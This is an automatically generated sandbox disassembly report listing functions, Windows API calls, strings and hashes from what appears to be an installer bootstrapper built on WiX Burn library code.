                                                                                                                                                                    • Instruction Fuzzy Hash: 0541B6B6150205AFDB219F299C49F1B7BA9EBC5720B218629FE14AB3D1DB71C801DB60
                                                                                                                                                                    Function 00942AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00903838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00903877
                                                                                                                                                                      • Part of subcall function 00903838: GetLastError.KERNEL32 ref: 00903881
                                                                                                                                                                      • Part of subcall function 00944A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00944A9D
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00942B41
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00942B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00942B81
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00942BA1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00942BC1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00942BE1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00942C01
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                    • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                    • API String ID: 2510051996-1735120554
                                                                                                                                                                    • Opcode ID: fbc79bb10875c7b9cc94c1aa9e57b43549d653b19323755f6f1d4d4714b4f761
                                                                                                                                                                    • Instruction ID: ddab3fefbe98e498ed9a2039b3753bc6181f59b14be34a2b2d5341da3e3db81d
                                                                                                                                                                    • Opcode Fuzzy Hash: fbc79bb10875c7b9cc94c1aa9e57b43549d653b19323755f6f1d4d4714b4f761
                                                                                                                                                                    • Instruction Fuzzy Hash: F331DFB1969209EBDB11AF60ED02B297BA4F794369F40013EE404D6170F7F20885FFA4
                                                                                                                                                                    Function 00921741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0090C3EB,?,00000000,?,0090C47F), ref: 00921778
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C3EB,?,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 00921781
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorEventLast
                                                                                                                                                                    • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 545576003-938279966
                                                                                                                                                                    • Opcode ID: 35b2fc3df926252b11d3087a905faede19c52c1c27f6a9ae32324441a07b4550
                                                                                                                                                                    • Instruction ID: b3e32f3bf286884f3a2c08f3da9467b2ce2f0e6a2dcc6f94cca546c9fd822de3
                                                                                                                                                                    • Opcode Fuzzy Hash: 35b2fc3df926252b11d3087a905faede19c52c1c27f6a9ae32324441a07b4550
                                                                                                                                                                    • Instruction Fuzzy Hash: 03212077D4073A77D33156A66C85F276A9CEF90774B124221FD04BB184E750DC1086E5
                                                                                                                                                                    Function 0093FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0093FCD6
                                                                                                                                                                    • GetProcAddress.KERNEL32(SystemFunction041), ref: 0093FCE8
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0093FD2B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093FD3F
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0093FD77
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0093FD8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast
                                                                                                                                                                    • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                    • API String ID: 4214558900-3191127217
                                                                                                                                                                    • Opcode ID: d96d088e667e47de48077f88d4b18975297a09ec077b8d3dad110cf136a0ef56
                                                                                                                                                                    • Instruction ID: 131ae30a7e02703ab5f35e817485a5b1418052b09a39e542688ac23cb2e755cb
                                                                                                                                                                    • Opcode Fuzzy Hash: d96d088e667e47de48077f88d4b18975297a09ec077b8d3dad110cf136a0ef56
                                                                                                                                                                    • Instruction Fuzzy Hash: CE21FC32D643359BC7315B16AD1DB866A98EB40B55F010139FC11EB2E0FBA48C41FED5
                                                                                                                                                                    Function 009208C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 009208F2
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0092090A
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0092090F
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00920912
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 0092091C
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0092098B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00920998
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to duplicate handle to cab container., xrefs: 0092094A
                                                                                                                                                                    • <the>.cab, xrefs: 009208EB
                                                                                                                                                                    • Failed to open cabinet file: %hs, xrefs: 009209C9
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920940, 009209BC
                                                                                                                                                                    • Failed to add virtual file pointer for cab container., xrefs: 00920971
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                    • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                    • API String ID: 3030546534-3446344238
                                                                                                                                                                    • Opcode ID: e52e98c65efbbf0b4da00b45bb59b726a3789ac6482d9546adaf40d6ae4f6654
                                                                                                                                                                    • Instruction ID: 2ad3d1fde01a9d55c13571ee60064fd455d3c9db39205ceea4c0a7f9a3609347
                                                                                                                                                                    • Opcode Fuzzy Hash: e52e98c65efbbf0b4da00b45bb59b726a3789ac6482d9546adaf40d6ae4f6654
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31043A941235BBEB20AB959C49F9EBE6CEF85761F114211FE05B7282D7709C00DBE0
                                                                                                                                                                    Function 00916A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00904E11,?,?), ref: 00916A77
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00904E11,?,?), ref: 00916A7D
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?,00904E11,?,?), ref: 00916A80
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00904E11,?,?), ref: 00916A8A
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,00904E11,?,?), ref: 00916B03
                                                                                                                                                                    Strings
                                                                                                                                                                    • burn.filehandle.attached, xrefs: 00916AD0
                                                                                                                                                                    • core.cpp, xrefs: 00916AAE
                                                                                                                                                                    • Failed to duplicate file handle for attached container., xrefs: 00916AB8
                                                                                                                                                                    • Failed to append the file handle to the command line., xrefs: 00916AEB
                                                                                                                                                                    • %ls -%ls=%u, xrefs: 00916AD7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                    • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                                                                    • API String ID: 4224961946-4196573879
                                                                                                                                                                    • Opcode ID: 6d9d24f65a3d84eced2350f5f1e3ada2c085bdbe3338285ab3bd6cfd825b2fc4
                                                                                                                                                                    • Instruction ID: 6c44c98ac3406fc7cf8318dbe6679bb66bd9efc215fff3ea7daf0e5f6ea5408b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d9d24f65a3d84eced2350f5f1e3ada2c085bdbe3338285ab3bd6cfd825b2fc4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9611AF32E50229FBCB10AEA98C09E9EBB68AF45735F118251FD20F72D0D7B49D0097D0
                                                                                                                                                                    Function 009432F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 760788290-3482516102
                                                                                                                                                                    • Opcode ID: 7b9584aa36611b35dbf4abf9c26880fa984f8e8d0aa9abecfe3fda2d8d57e29d
                                                                                                                                                                    • Instruction ID: 01770af716768999d33400a10dc3dd165d1a7c8c00916b02bc6aa20b8cec68bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9584aa36611b35dbf4abf9c26880fa984f8e8d0aa9abecfe3fda2d8d57e29d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4221A335901219EFCB25DFA5C848FAEBBB9AF85711F558258F905AB220DB31DE009B90
                                                                                                                                                                    Function 00940879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenProcessToken.ADVAPI32(?,00000008,?,009053BD,00000000,?,?,?,?,?,?,?,0091769D,00000000), ref: 00940897
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408A1
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0091769D,00000000), ref: 009408D3
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408EC
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0091769D,00000000), ref: 0094092B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                    • String ID: procutil.cpp
                                                                                                                                                                    • API String ID: 4040495316-1178289305
                                                                                                                                                                    • Opcode ID: 1d07b117ce84087ee6935e2e6e757bfabd048a5a35e489b01013cd307cd623f2
                                                                                                                                                                    • Instruction ID: 95ce3d42e6c09a85539e9f38ebc587d32b4cb799d3295745afcff6eb8f7b5e87
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d07b117ce84087ee6935e2e6e757bfabd048a5a35e489b01013cd307cd623f2
                                                                                                                                                                    • Instruction Fuzzy Hash: C321C636D40229EBE7219B998905E9EBBBCEF90711F114156FE15EB251D3708E00EBD0
                                                                                                                                                                    Function 00916B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00916B49
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00916BB9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                                    • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                                    • API String ID: 3498533004-3263533295
                                                                                                                                                                    • Opcode ID: c48175af16043d90c9a1e8282b6452284d511cef2de1d41e2bc39af9fd77c8d9
                                                                                                                                                                    • Instruction ID: df0edd26828ae1f66bf061ab3514d29316b56c58779e7c464d520554c70753ae
                                                                                                                                                                    • Opcode Fuzzy Hash: c48175af16043d90c9a1e8282b6452284d511cef2de1d41e2bc39af9fd77c8d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 1611E632B48618BFCB205A6CCC05F9B77ACDB85B34F010350FE24EB2E1D37488518691
                                                                                                                                                                    Function 00943565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00943574
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(0096B6C8), ref: 00943591
                                                                                                                                                                    • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0096B6B8,?,?,?,?,?,?), ref: 009435AC
                                                                                                                                                                    • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0096B6B8,?,?,?,?,?,?), ref: 009435B8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                    • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                    • API String ID: 2109125048-2356320334
                                                                                                                                                                    • Opcode ID: 0f339e13939271336ee26b2f41b9402e4309343bf14b774b1acf68d7324710e5
                                                                                                                                                                    • Instruction ID: ba61ec5452c232880f0d31ac471c0905b5d7f8b5e4c778f80242f39b244641b4
                                                                                                                                                                    • Opcode Fuzzy Hash: 0f339e13939271336ee26b2f41b9402e4309343bf14b774b1acf68d7324710e5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0E53175522957C3201B76FD18F0B2EA9EBC1B69F000529F808C2064E3A0C98186B0
                                                                                                                                                                    Function 00944A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00944A9D
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00944ACA
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00944AF6
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,0094B7A0,?,00000000,?,00000000,?,00000000), ref: 00944B34
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00944B65
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1145190524-2967768451
                                                                                                                                                                    • Opcode ID: c21f5247588e8d19d738913aec74a4685b52ab852bf4378405dbdc12c4581fd3
                                                                                                                                                                    • Instruction ID: 764d4b24acd2d189ef159590720dbea90d0d1eb20ba2316ef76b70c85179290f
                                                                                                                                                                    • Opcode Fuzzy Hash: c21f5247588e8d19d738913aec74a4685b52ab852bf4378405dbdc12c4581fd3
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E318436E84229ABC721DA998C41FAFBABCEF85750F114265FD14EB341E730DD0096E4
                                                                                                                                                                    Function 00920A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00920B27
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 00920B31
                                                                                                                                                                    Strings
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920B55
                                                                                                                                                                    • Failed to move file pointer 0x%x bytes., xrefs: 00920B62
                                                                                                                                                                    • Invalid seek type., xrefs: 00920ABD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                    • API String ID: 2976181284-417918914
                                                                                                                                                                    • Opcode ID: 0b4a24be21b1cd65e66090cffc2275d687b9b06ab12547e0037479ab0549cc60
                                                                                                                                                                    • Instruction ID: 461d059644c4bcff59e704cd84e41689abdcc89a9f158bd292d4d462ddbff2ed
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4a24be21b1cd65e66090cffc2275d687b9b06ab12547e0037479ab0549cc60
                                                                                                                                                                    • Instruction Fuzzy Hash: 2331A332A4022AEFCF10DFA8EC45E6EB769FB84724B148615FD1497656D370ED108B90
                                                                                                                                                                    Function 00904115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?), ref: 00904123
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 00904131
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,840F01E8,00905489,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000), ref: 0090419A
                                                                                                                                                                    • GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 009041A4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                    • String ID: dirutil.cpp
                                                                                                                                                                    • API String ID: 1375471231-2193988115
                                                                                                                                                                    • Opcode ID: 56063cf70e9912432f9c88a8bb0820e920f307f1aca7c45a9baec812afeb17c3
                                                                                                                                                                    • Instruction ID: 7ab24ddb7d2d62cd29c3fe8ae45b840706f457ae37749a56b74fd3d56bfff6ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 56063cf70e9912432f9c88a8bb0820e920f307f1aca7c45a9baec812afeb17c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 311105B660C335AED7B11AA54C40B3BA65CEF75B61F114021FF05EA1C0E3648C8192D0
                                                                                                                                                                    Function 009056A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
